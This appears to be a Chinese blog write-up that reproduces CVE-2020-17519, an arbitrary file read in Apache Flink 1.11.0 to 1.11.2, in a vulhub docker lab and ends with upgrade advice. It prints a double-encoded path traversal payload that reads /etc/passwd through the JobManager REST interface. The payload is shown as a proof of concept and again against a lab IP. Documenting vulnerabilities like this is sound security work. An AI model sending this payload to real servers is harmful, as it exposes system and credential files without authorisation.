Apache Flink -任意文件读取漏洞(CVE-2020-17519)

1.漏洞描述

          Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。

         Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

2.影响版本

  • 1.11.0
  • 1.11.1
  • 1.11.2

3.POC

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

4.环境搭建

1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17519目录

docker-compose up-d

Apache Flink -任意文件读取漏洞(CVE-2020-17519)

2)访问http://192.168.157.148:8081,环境搭建成功,如下图所示

Apache Flink -任意文件读取漏洞(CVE-2020-17519)

5.漏洞复现

直接访问POC

http://192.168.157.148:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Apache Flink -任意文件读取漏洞(CVE-2020-17519)

6.修复建议

升级Flink 到1.11.3或1.12.0版本,下载链接为:

https://flink.apache.org/downloads.html

https://flink.apache.org/downloads.html

上一篇:Apache Flink漏洞(CVE-2020-17519)复现


下一篇:【Spring学习笔记-1】Myeclipse下Spring环境搭建